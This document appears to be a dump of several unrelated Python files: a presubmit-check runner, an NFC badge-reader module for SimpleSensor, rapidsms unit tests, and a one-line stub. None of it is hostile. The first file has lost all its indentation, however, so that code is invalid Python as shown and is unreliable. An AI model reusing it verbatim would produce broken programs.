# A deleted file is not testable.
self._is_testable_file = False
else:
self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath())
return self._is_testable_file
class Change(object):
"""Describe a change.
Used directly by the presubmit scripts to query the current change being
tested.
Instance members:
tags: Dictionary of KEY=VALUE pairs found in the change description.
self.KEY: equivalent to tags['KEY']
"""
_AFFECTED_FILES = AffectedFile
# Matches key/value (or "tag") lines in changelist descriptions.
TAG_LINE_RE = re.compile(
'^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
scm = ''
def __init__(
self, name, description, local_root, files, issue, patchset, author,
upstream=None):
if files is None:
files = []
self._name = name
# Convert root into an absolute path.
self._local_root = os.path.abspath(local_root)
self._upstream = upstream
self.issue = issue
self.patchset = patchset
self.author_email = author
self._full_description = ''
self.tags = {}
self._description_without_tags = ''
self.SetDescriptionText(description)
assert all(
(isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files
diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
self._affected_files = [
self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
for action, path in files
]
def Name(self):
"""Returns the change name."""
return self._name
def DescriptionText(self):
"""Returns the user-entered changelist description, minus tags.
Any line in the user-provided description starting with e.g. "FOO="
(whitespace permitted before and around) is considered a tag line. Such
lines are stripped out of the description this function returns.
"""
return self._description_without_tags
def FullDescriptionText(self):
"""Returns the complete changelist description including tags."""
return self._full_description
def SetDescriptionText(self, description):
"""Sets the full description text (including tags) to |description|.
Also updates the list of tags."""
self._full_description = description
# From the description text, build up a dictionary of key/value pairs
# plus the description minus all key/value or "tag" lines.
description_without_tags = []
self.tags = {}
for line in self._full_description.splitlines():
m = self.TAG_LINE_RE.match(line)
if m:
self.tags[m.group('key')] = m.group('value')
else:
description_without_tags.append(line)
# Change back to text and remove whitespace at end.
self._description_without_tags = (
'\n'.join(description_without_tags).rstrip())
def RepositoryRoot(self):
"""Returns the repository (checkout) root directory for this change,
as an absolute path.
"""
return self._local_root
def __getattr__(self, attr):
"""Return tags directly as attributes on the object."""
if not re.match(r"^[A-Z_]*$", attr):
raise AttributeError(self, attr)
return self.tags.get(attr)
def BugsFromDescription(self):
"""Returns all bugs referenced in the commit description."""
tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()]
footers = []
unsplit_footers = git_footers.parse_footers(self._full_description).get(
'Bug', [])
for unsplit_footer in unsplit_footers:
footers += [b.strip() for b in unsplit_footer.split(',')]
return sorted(set(tags + footers))
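  # For example (hypothetical description): with "BUG=123,456" in the tags and
  # a "Bug: 789" git footer, this returns ['123', '456', '789'] (merged,
  # de-duplicated and sorted as strings).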
def ReviewersFromDescription(self):
"""Returns all reviewers listed in the commit description."""
# We don't support a "R:" git-footer for reviewers; that is in metadata.
tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
return sorted(set(tags))
def TBRsFromDescription(self):
"""Returns all TBR reviewers listed in the commit description."""
tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
# TODO(agable): Remove support for 'Tbr:' when TBRs are programmatically
# determined by self-CR+1s.
footers = git_footers.parse_footers(self._full_description).get('Tbr', [])
return sorted(set(tags + footers))
# TODO(agable): Delete these once we're sure they're unused.
@property
def BUG(self):
return ','.join(self.BugsFromDescription())
@property
def R(self):
return ','.join(self.ReviewersFromDescription())
@property
def TBR(self):
return ','.join(self.TBRsFromDescription())
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
raise NotImplementedError()
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Returns a list of AffectedFile instances for all files in the change.
Args:
include_deletes: If false, deleted files will be filtered out.
file_filter: An additional filter to apply.
Returns:
[AffectedFile(path, action), AffectedFile(path, action)]
"""
affected = filter(file_filter, self._affected_files)
if include_deletes:
return affected
return filter(lambda x: x.Action() != 'D', affected)
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Return a list of the existing text files in a change."""
if include_deletes is not None:
warn("AffectedTeestableFiles(include_deletes=%s)"
" is deprecated and ignored" % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return filter(lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def LocalPaths(self):
"""Convenience function."""
return [af.LocalPath() for af in self.AffectedFiles()]
def AbsoluteLocalPaths(self):
"""Convenience function."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def RightHandSideLines(self):
"""An iterator over all text lines in "new" version of changed files.
Lists lines from new or modified text files in the change.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
"""
return _RightHandSideLinesImpl(
x for x in self.AffectedFiles(include_deletes=False)
if x.IsTestableFile())
def OriginalOwnersFiles(self):
"""A map from path names of affected OWNERS files to their old content."""
def owners_file_filter(f):
return 'OWNERS' in os.path.split(f.LocalPath())[1]
files = self.AffectedFiles(file_filter=owners_file_filter)
return dict([(f.LocalPath(), f.OldContents()) for f in files])
class GitChange(Change):
_AFFECTED_FILES = GitAffectedFile
scm = 'git'
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
root = root or self.RepositoryRoot()
return subprocess.check_output(
['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'],
cwd=root).splitlines()
def ListRelevantPresubmitFiles(files, root):
"""Finds all presubmit files that apply to a given set of source files.
If inherit-review-settings-ok is present right under root, looks for
PRESUBMIT.py in directories enclosing root.
Args:
files: An iterable container containing file paths.
root: Path where to stop searching.
Return:
List of absolute paths of the existing PRESUBMIT.py scripts.
"""
files = [normpath(os.path.join(root, f)) for f in files]
# List all the individual directories containing files.
directories = set([os.path.dirname(f) for f in files])
# Ignore root if inherit-review-settings-ok is present.
if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
root = None
# Collect all unique directories that may contain PRESUBMIT.py.
candidates = set()
for directory in directories:
while True:
if directory in candidates:
break
candidates.add(directory)
if directory == root:
break
parent_dir = os.path.dirname(directory)
if parent_dir == directory:
# We hit the system root directory.
break
directory = parent_dir
# Look for PRESUBMIT.py in all candidate directories.
results = []
for directory in sorted(list(candidates)):
try:
for f in os.listdir(directory):
p = os.path.join(directory, f)
if os.path.isfile(p) and re.match(
r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'):
results.append(p)
except OSError:
pass
logging.debug('Presubmit files: %s', ','.join(results))
return results
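# Illustrative example (paths are hypothetical): for files=['a/b/c.cc'] and
# root='/src', the candidate directories are /src/a/b, /src/a and /src, and any
# PRESUBMIT*.py found there (excluding PRESUBMIT_test*) is returned. If
# /src/inherit-review-settings-ok exists, root is ignored and the walk
# continues up to the filesystem root.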
class GetTryMastersExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, project, change):
"""Executes GetPreferredTryMasters() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
project: Project name to pass to presubmit script for bot selection.
Return:
A map of try masters to map of builders to set of tests.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'GetPreferredTryMasters'
if function_name not in context:
return {}
get_preferred_try_masters = context[function_name]
if not len(inspect.getargspec(get_preferred_try_masters)[0]) == 2:
raise PresubmitFailure(
'Expected function "GetPreferredTryMasters" to take two arguments.')
return get_preferred_try_masters(project, change)
class GetPostUploadExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, cl, change):
"""Executes PostUploadHook() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
cl: The Changelist object.
change: The Change object.
Return:
A list of results objects.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'PostUploadHook'
if function_name not in context:
return {}
post_upload_hook = context[function_name]
if not len(inspect.getargspec(post_upload_hook)[0]) == 3:
raise PresubmitFailure(
'Expected function "PostUploadHook" to take three arguments.')
return post_upload_hook(cl, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(masters1.iteritems(),
masters2.iteritems()):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.iteritems():
new_builders.setdefault(builder, set([])).update(tests)
return result
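# For example (hypothetical input):
#   _MergeMasters({'master.a': {'bot': set(['t1'])}},
#                 {'master.a': {'bot': set(['t2'])}})
#   returns {'master.a': {'bot': set(['t1', 't2'])}}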
def DoGetTryMasters(change,
changed_files,
repository_root,
default_presubmit,
project,
verbose,
output_stream):
"""Get the list of try masters from the presubmit scripts.
Args:
changed_files: List of modified files.
repository_root: The repository root.
default_presubmit: A default presubmit script to execute in any case.
project: Optional name of a project used in selecting trybots.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
Return:
Map of try masters to map of builders to set of tests.
"""
presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root)
if not presubmit_files and verbose:
output_stream.write("Warning, no PRESUBMIT.py found.\n")
results = {}
executer = GetTryMastersExecuter()
if default_presubmit:
if verbose:
output_stream.write("Running default presubmit script.\n")
fake_path = os.path.join(repository_root, 'PRESUBMIT.py')
results = _MergeMasters(results, executer.ExecPresubmitScript(
default_presubmit, fake_path, project, change))
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results = _MergeMasters(results, executer.ExecPresubmitScript(
presubmit_script, filename, project, change))
# Make sets to lists again for later JSON serialization.
for builders in results.itervalues():
for builder in builders:
builders[builder] = list(builders[builder])
if results and verbose:
output_stream.write('%s\n' % str(results))
return results
def DoPostUploadExecuter(change,
cl,
repository_root,
verbose,
output_stream):
"""Execute the post upload hook.
Args:
change: The Change object.
cl: The Changelist object.
repository_root: The repository root.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
"""
presubmit_files = ListRelevantPresubmitFiles(
change.LocalPaths(), repository_root)
if not presubmit_files and verbose:
output_stream.write("Warning, no PRESUBMIT.py found.\n")
results = []
executer = GetPostUploadExecuter()
# The root presubmit file should be executed after the ones in subdirectories.
# i.e. the specific post upload hooks should run before the general ones.
# Thus, reverse the order provided by ListRelevantPresubmitFiles.
presubmit_files.reverse()
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results.extend(executer.ExecPresubmitScript(
presubmit_script, filename, cl, change))
output_stream.write('\n')
if results:
output_stream.write('** Post Upload Hook Messages **\n')
for result in results:
result.handle(output_stream)
output_stream.write('\n')
return results
class PresubmitExecuter(object):
def __init__(self, change, committing, verbose,
gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
self.change = change
self.committing = committing
self.gerrit = gerrit_obj
self.verbose = verbose
self.dry_run = dry_run
self.more_cc = []
self.thread_pool = thread_pool
self.parallel = parallel
def ExecPresubmitScript(self, script_text, presubmit_path):
"""Executes a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: The path to the presubmit file (this will be reported via
input_api.PresubmitLocalPath()).
Return:
A list of result objects, empty if no problems.
"""
# Change to the presubmit file's directory to support local imports.
main_path = os.getcwd()
os.chdir(os.path.dirname(presubmit_path))
# Load the presubmit script into context.
input_api = InputApi(self.change, presubmit_path, self.committing,
self.verbose, gerrit_obj=self.gerrit,
dry_run=self.dry_run, thread_pool=self.thread_pool,
parallel=self.parallel)
output_api = OutputApi(self.committing)
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))
# These function names must change if we make substantial changes to
# the presubmit API that are not backwards compatible.
if self.committing:
function_name = 'CheckChangeOnCommit'
else:
function_name = 'CheckChangeOnUpload'
if function_name in context:
try:
context['__args'] = (input_api, output_api)
logging.debug('Running %s in %s', function_name, presubmit_path)
result = eval(function_name + '(*__args)', context)
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
finally:
map(os.remove, input_api._named_temporary_files)
if not (isinstance(result, types.TupleType) or
isinstance(result, types.ListType)):
raise PresubmitFailure(
'Presubmit functions must return a tuple or list')
for item in result:
if not isinstance(item, OutputApi.PresubmitResult):
raise PresubmitFailure(
'All presubmit results must be of types derived from '
'output_api.PresubmitResult')
else:
result = () # no error since the script doesn't care about current event.
# Return the process to the original working directory.
os.chdir(main_path)
return result
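# A minimal PRESUBMIT.py that ExecPresubmitScript above can drive looks roughly
# like this (sketch, not part of this file):
#   def CheckChangeOnUpload(input_api, output_api):
#     return [output_api.PresubmitNotifyResult('hello from presubmit')]
# The same signature is used for CheckChangeOnCommit when committing.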
def DoPresubmitChecks(change,
committing,
verbose,
output_stream,
input_stream,
default_presubmit,
may_prompt,
gerrit_obj,
dry_run=None,
parallel=False,
json_output=None):
"""Runs all presubmit checks that apply to the files in the change.
This finds all PRESUBMIT.py files in directories enclosing the files in the
change (up to the repository root) and calls the relevant entrypoint function
depending on whether the change is being committed or uploaded.
Prints errors, warnings and notifications. Prompts the user for warnings
when needed.
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
verbose: Prints debug info.
output_stream: A stream to write output from presubmit tests to.
input_stream: A stream to read input from the user.
default_presubmit: A default presubmit script to execute in any case.
may_prompt: Enable (y/n) questions on warning or error. If False,
any questions are answered with yes by default.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests specified by input_api.RunTests in all
PRESUBMIT files will be run in parallel.
Warning:
If may_prompt is true, output_stream SHOULD be sys.stdout and input_stream
SHOULD be sys.stdin.
Return:
A PresubmitOutput object. Use output.should_continue() to figure out
if there were errors or warnings and the caller should abort.
"""
old_environ = os.environ
try:
# Make sure python subprocesses won't generate .pyc files.
os.environ = os.environ.copy()
os.environ['PYTHONDONTWRITEBYTECODE'] = '1'
output = PresubmitOutput(input_stream, output_stream)
if committing:
output.write("Running presubmit commit checks ...\n")
else:
output.write("Running presubmit upload checks ...\n")
start_time = time.time()
presubmit_files = ListRelevantPresubmitFiles(
change.AbsoluteLocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
output.write("Warning, no PRESUBMIT.py found.\n")
results = []
thread_pool = ThreadPool()
executer = PresubmitExecuter(change, committing, verbose, gerrit_obj,
dry_run, thread_pool, parallel)
if default_presubmit:
if verbose:
output.write("Running default presubmit script.\n")
fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
results += executer.ExecPresubmitScript(default_presubmit, fake_path)
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results += executer.ExecPresubmitScript(presubmit_script, filename)
results += thread_pool.RunAsync()
output.more_cc.extend(executer.more_cc)
errors = []
notifications = []
warnings = []
for result in results:
if result.fatal:
errors.append(result)
elif result.should_prompt:
warnings.append(result)
else:
notifications.append(result)
if json_output:
# Write the presubmit results to json output
presubmit_results = {
'errors': [
error.json_format() for error in errors
],
'notifications': [
notification.json_format() for notification in notifications
],
'warnings': [
warning.json_format() for warning in warnings
]
}
gclient_utils.FileWrite(json_output, json.dumps(presubmit_results))
output.write('\n')
for name, items in (('Messages', notifications),
('Warnings', warnings),
('ERRORS', errors)):
if items:
output.write('** Presubmit %s **\n' % name)
for item in items:
item.handle(output)
output.write('\n')
total_time = time.time() - start_time
if total_time > 1.0:
output.write("Presubmit checks took %.1fs to calculate.\n\n" % total_time)
if errors:
output.fail()
elif warnings:
output.write('There were presubmit warnings. ')
if may_prompt:
output.prompt_yes_no('Are you sure you wish to continue? (y/N): ')
else:
output.write('Presubmit checks passed.\n')
global _ASKED_FOR_FEEDBACK
# Ask for feedback one time out of 5.
if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
output.write(
'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
'to figure out which PRESUBMIT.py was run, then run git blame\n'
'on the file to figure out who to ask for help.\n')
_ASKED_FOR_FEEDBACK = True
return output
finally:
os.environ = old_environ
def ScanSubDirs(mask, recursive):
if not recursive:
return [x for x in glob.glob(mask) if x not in ('.svn', '.git')]
results = []
for root, dirs, files in os.walk('.'):
if '.svn' in dirs:
dirs.remove('.svn')
if '.git' in dirs:
dirs.remove('.git')
for name in files:
if fnmatch.fnmatch(name, mask):
results.append(os.path.join(root, name))
return results
def ParseFiles(args, recursive):
logging.debug('Searching for %s', args)
files = []
for arg in args:
files.extend([('M', f) for f in ScanSubDirs(arg, recursive)])
return files
def load_files(options, args):
"""Tries to determine the SCM."""
files = []
if args:
files = ParseFiles(args, options.recursive)
change_scm = scm.determine_scm(options.root)
if change_scm == 'git':
change_class = GitChange
upstream = options.upstream or None
if not files:
files = scm.GIT.CaptureStatus([], options.root, upstream)
else:
logging.info('Doesn\'t seem under source control. Got %d files', len(args))
if not files:
return None, None
change_class = Change
return change_class, files
@contextlib.contextmanager
def canned_check_filter(method_names):
filtered = {}
try:
for method_name in method_names:
if not hasattr(presubmit_canned_checks, method_name):
logging.warn('Skipping unknown "canned" check %s' % method_name)
continue
filtered[method_name] = getattr(presubmit_canned_checks, method_name)
setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
yield
finally:
for name, method in filtered.iteritems():
setattr(presubmit_canned_checks, name, method)
def main(argv=None):
parser = optparse.OptionParser(usage="%prog [options] <files...>",
version="%prog " + str(__version__))
parser.add_option("-c", "--commit", action="store_true", default=False,
help="Use commit instead of upload checks")
parser.add_option("-u", "--upload", action="store_false", dest='commit',
help="Use upload instead of commit checks")
parser.add_option("-r", "--recursive", action="store_true",
help="Act recursively")
parser.add_option("-v", "--verbose", action="count", default=0,
help="Use 2 times for more debug info")
parser.add_option("--name", default='no name')
parser.add_option("--author")
parser.add_option("--description", default='')
parser.add_option("--issue", type='int', default=0)
parser.add_option("--patchset", type='int', default=0)
parser.add_option("--root", default=os.getcwd(),
help="Search for PRESUBMIT.py up to this directory. "
"If inherit-review-settings-ok is present in this "
"directory, parent directories up to the root file "
"system directories will also be searched.")
parser.add_option("--upstream",
help="Git only: the base ref or upstream branch against "
"which the diff should be computed.")
parser.add_option("--default_presubmit")
parser.add_option("--may_prompt", action='store_true', default=False)
parser.add_option("--skip_canned", action='append', default=[],
help="A list of checks to skip which appear in "
"presubmit_canned_checks. Can be provided multiple times "
"to skip multiple canned checks.")
parser.add_option("--dry_run", action='store_true',
help=optparse.SUPPRESS_HELP)
parser.add_option("--gerrit_url", help=optparse.SUPPRESS_HELP)
parser.add_option("--gerrit_fetch", action='store_true',
help=optparse.SUPPRESS_HELP)
parser.add_option('--parallel', action='store_true',
help='Run all tests specified by input_api.RunTests in all '
'PRESUBMIT files in parallel.')
parser.add_option('--json_output',
help='Write presubmit errors to json output.')
options, args = parser.parse_args(argv)
if options.verbose >= 2:
logging.basicConfig(level=logging.DEBUG)
elif options.verbose:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.ERROR)
change_class, files = load_files(options, args)
if not change_class:
parser.error('For unversioned directory, <files> is not optional.')
logging.info('Found %d file(s).', len(files))
gerrit_obj = None
if options.gerrit_url and options.gerrit_fetch:
assert options.issue and options.patchset
gerrit_obj = GerritAccessor(urlparse.urlparse(options.gerrit_url).netloc)
options.author = gerrit_obj.GetChangeOwner(options.issue)
options.description = gerrit_obj.GetChangeDescription(options.issue,
options.patchset)
logging.info('Got author: "%s"', options.author)
logging.info('Got description: """\n%s\n"""', options.description)
try:
with canned_check_filter(options.skip_canned):
results = DoPresubmitChecks(
change_class(options.name,
options.description,
options.root,
files,
options.issue,
options.patchset,
options.author,
upstream=options.upstream),
options.commit,
options.verbose,
sys.stdout,
sys.stdin,
options.default_presubmit,
options.may_prompt,
gerrit_obj,
options.dry_run,
options.parallel,
options.json_output)
return not results.should_continue()
except PresubmitFailure as e:
print(e, file=sys.stderr)
print('Maybe your depot_tools is out of date?', file=sys.stderr)
return 2
if __name__ == '__main__':
fix_encoding.fix_encoding()
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(2)
|
collectionModule.py
|
"""
Sample structure for a collection point module.
This module describes the basic uses of SimpleSensor.
To make your own module, this is a good place to start.
"""
from simplesensor.collection_modules.nfc_bcard_reader import moduleConfigLoader as configLoader
from simplesensor.shared import Message, ThreadsafeLogger, ModuleProcess
from multiprocessing import Process
from threading import Thread
import time
import json
import struct
import datetime
from smartcard.scard import *
import smartcard.util
_HEADER_SIZE = 6
class CollectionModule(ModuleProcess):
# You can keep these parameters the same, all modules receive the same params
# self - reference to self
# baseConfig - configuration settings defined in /simplesensor/config/base.conf
# (https://github.com/AdobeAtAdobe/SimpleSensor/blob/master/config/base.conf)
# pInBoundQueue - messages from handler to this module
# pOutBoundQueue - messages from this module to other modules
# loggingQueue - logging messages for threadsafe logger
def __init__(self, baseConfig, pInBoundQueue, pOutBoundQueue, loggingQueue):
"""
Initialize new CollectionModule instance.
"""
super(CollectionModule, self).__init__(baseConfig, pInBoundQueue, pOutBoundQueue, loggingQueue)
# Most collection modules will follow a similar pattern...
# 1. Set up some variables on the self object
# Queues
self.outQueue = pOutBoundQueue
self.inQueue= pInBoundQueue
self.loggingQueue = loggingQueue
self.threadProcessQueue = None
self.alive = False
self.context = None
self.reader = None
# 2. Load the module's configuration file
# Configs
self.moduleConfig = configLoader.load(self.loggingQueue, __name__)
self.config = baseConfig
# 3. Set some constants to the self object from config parameters (if you want)
self._id = self.moduleConfig['CollectionPointId']
self._type = self.moduleConfig['CollectionPointType']
self._port = self.moduleConfig['ReaderPortNumber']
# 4. Create a threadsafe logger object
self.logger = ThreadsafeLogger(loggingQueue, __name__)
def run(self):
"""
Main process method, run when the thread's start() function is called.
Starts monitoring inbound messages to this module, and collection logic goes here.
For example, you could put a loop with a small delay to keep polling the sensor, etc.
When something is detected that's relevant, put a message on the outbound queue.
"""
# Monitor inbound queue on own thread
self.listen()
self.alive = True
while self.context == None:
self.establish_context()
while self.alive:
while self.reader == None:
self.reader = self.get_reader()
if self.reader is None:
self.logger.info('Waiting for 5 seconds before '
+ 'trying to find readers again. Is it plugged in?')
time.sleep(5)
# connect to card
card = self.get_card()
if card is None:
continue
# get block #10 and 11 of card,
# contains the attendee ID
msg = [0xFF, 0xB0, 0x00, bytes([10])[0], 0x04]
chunk_one = self.send_transmission(card, msg)
if chunk_one is None:
self.reader = None
continue
msg = [0xFF, 0xB0, 0x00, bytes([11])[0], 0x04]
chunk_two = self.send_transmission(card, msg)
if chunk_two is None:
self.reader = None
continue
# the id is in B1-3 of block 10
# and B0-2 of block 11
attendee_id_bytes = bytearray(chunk_one[1:4]+chunk_two[0:3])
attendee_id = attendee_id_bytes.decode('UTF-8')
xdata = {
'attendee_id': attendee_id
}
msg = self.build_message(topic='scan_in', extendedData=xdata)
self.logger.info('Sending message: {}'.format(msg))
self.put_message(msg)
self.reader = None
# sleep for a bit to avoid double scanning
time.sleep(5)
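    # Note on the two SCardTransmit calls in run() above (interpretation based
    # on the common PC/SC "Read Binary" convention, not stated in this module):
    # [0xFF, 0xB0, 0x00, block, 0x04] asks the reader for 4 bytes of the given
    # block, so blocks 10 and 11 together supply the 6 bytes of the attendee ID.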
def establish_context(self):
hresult, hcontext = SCardEstablishContext(SCARD_SCOPE_USER)
if hresult != SCARD_S_SUCCESS:
self.logger.error(
'Unable to establish context: {}'.format(
SCardGetErrorMessage(hresult)))
return
self.context = hcontext
def get_reader(self):
hresult, readers = SCardListReaders(self.context, [])
if hresult != SCARD_S_SUCCESS:
self.logger.error(
'Failed to list readers: {}'.format(
SCardGetErrorMessage(hresult)))
return
if len(readers)<1 or len(readers)-1<self._port:
self.logger.error(
'Not enough readers attached. {} needed, {} attached'.format(
(self._port+1), (len(readers))))
return
else:
return readers[self._port]
def get_card(self, mode=None, protocol=None):
hresult, hcard, dwActiveProtocol = SCardConnect(
self.context,
self.reader,
mode or SCARD_SHARE_SHARED,
protocol or (SCARD_PROTOCOL_T0 | SCARD_PROTOCOL_T1))
if hresult != SCARD_S_SUCCESS:
return
else:
return hcard
def send_transmission(self, card, msg, protocol=None):
hresult, response = SCardTransmit(
card,
protocol or SCARD_PCI_T1,
msg)
if hresult != SCARD_S_SUCCESS:
self.logger.error(
'Failed to send transmission: {}'.format(
SCardGetErrorMessage(hresult)))
return
else:
return response[:-2]
def listen(self):
"""
Start thread to monitor inbound messages, declare module alive.
"""
self.threadProcessQueue = Thread(target=self.process_queue)
self.threadProcessQueue.setDaemon(True)
self.threadProcessQueue.start()
def build_message(self, topic, extendedData={}, recipients=['communication_modules']):
"""
Create a Message instance.
topic (required): message type
sender_id (required): id property of original sender
sender_type (optional): type of sender, ie. collection point type, module name, hostname, etc
extended_data (optional): payload to deliver to recipient(s)
recipients (optional): module name, which module(s) the message will be delivered to, ie. `websocket_server`.
use an array of strings to define multiple modules to send to.
use 'all' to send to all available modules.
use 'local_only' to send only to modules with `low_cost` prop set to True.
[DEFAULT] use 'communication_modules' to send only to communication modules.
use 'collection_modules' to send only to collection modules.
"""
msg = Message(
topic=topic,
sender_id=self._id,
sender_type=self._type,
extended_data=extendedData,
recipients=recipients,
timestamp=datetime.datetime.utcnow())
return msg
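    # Example usage (values are hypothetical): a scan of attendee '123456' is
    # reported from run() as
    #   self.build_message(topic='scan_in', extendedData={'attendee_id': '123456'})
    # which yields a Message addressed to the communication modules by default.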
def put_message(self, msg):
"""
Put message onto outgoing queue.
"""
self.outQueue.put(msg)
def process_queue(self):
"""
Process inbound messages on separate thread.
When a message is encountered, trigger an event to handle it.
Sleep for some small amount of time to avoid overloading.
Also receives a SHUTDOWN message from the main process when
the user presses the esc key.
"""
self.logger.info("Starting to watch collection point inbound message queue")
while self.alive:
if (self.inQueue.empty() == False):
self.logger.info("Queue size is %s" % self.inQueue.qsize())
try:
message = self.inQueue.get(block=False,timeout=1)
if message is not None:
self.handle_message(message)
except Exception as e:
self.logger.error("Error, unable to read queue: %s " %e)
self.shutdown()
self.logger.info("Queue size is %s after" % self.inQueue.qsize())
else:
time.sleep(.25)
def handle_message(self, message):
"""
Handle messages from other modules to this one.
Switch on the message topic, do something with the data fields.
"""
if message.topic.upper()=='SHUTDOWN' and message.sender_id=='main':
self.shutdown()
def shutdown(self):
"""
Shutdown the collection module.
Set alive flag to false so it stops looping.
Wait for things to die, then exit.
"""
self.alive = False
print("Shutting down nfc_bcard_reader")
time.sleep(1)
self.exit = True
|
test_component.py
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import unittest
from rapidsms.component import Component, Receiver
import threading, time
class TestComponent(unittest.TestCase):
def test_router (self):
c = Component()
self.assertEquals(c.router, None, "no router set yet")
c._router = "(router)"
self.assertEquals(c.router, "(router)", "router can be set")
def test_title(self):
c = Component()
self.assertEquals(c.title, "component", "Component.title has a default")
c._title = "TestComponent"
self.assertEquals(c.title, "TestComponent", "Component.title can be set")
def test_config_requires(self):
c = Component()
self.assertEquals(c.config_requires("example", "hello"), "hello",
"config_requires returns value if not None")
self.assertRaises(Exception, c.config_requires, "example", None,
"config_requires raises an Exception if value is None")
def test_config_bool (self):
c = Component()
self.assertTrue(c.config_bool("true"), "config_bool accepts true")
self.assertTrue(c.config_bool("True"), "config_bool accepts True")
self.assertTrue(c.config_bool("yes"), "config_bool accepts yes")
self.assertTrue(c.config_bool("YES"), "config_bool accepts YES")
self.assertFalse(c.config_bool("false"), "config_bool accepts false")
self.assertFalse(c.config_bool("no"), "config_bool accepts no")
def test_config_list (self):
c = Component()
self.assertEquals(c.config_list("a,b,c"),["a","b","c"], "config_list parses str")
self.assertEquals(c.config_list(["a","b"]),["a","b"], "config_list copies list")
self.assertEquals(c.config_list("a"),["a"], "config_list creates len-1 list")
def test__logging_method(self):
self.assertTrue(callable(Component.debug), "Component has debug log method")
self.assertTrue(callable(Component.info), "Component has info log method")
self.assertTrue(callable(Component.warning), "Component has warning log method")
self.assertTrue(callable(Component.error), "Component has error log method")
self.assertTrue(callable(Component.critical), "Component has critical log method")
class TestReceiver(unittest.TestCase):
def test_message_waiting(self):
r = Receiver()
r.send("message 1")
self.assertEquals(r.message_waiting, 1, "1 message is waiting")
def test_next_message (self):
r = Receiver()
self.assertEquals(r.next_message(), None, "no message waiting")
r.send("message 2")
self.assertEquals(r.next_message(), "message 2", "got a message")
self.assertEquals(r.next_message(), None, "message was removed")
def send_a_message_later (secs):
time.sleep(secs)
r.send("message 3")
thread = threading.Thread(target=send_a_message_later, args=(0.5,))
thread.start()
self.assertEquals(r.next_message(5.0), "message 3", "block and wait")
thread = threading.Thread(target=send_a_message_later, args=(5.0,))
thread.start()
self.assertEquals(r.next_message(0.5), None, "next_msg doesn't block too long")
if __name__ == "__main__":
unittest.main()
|
experimental.py
|
from __future__ import absolute_import, print_function
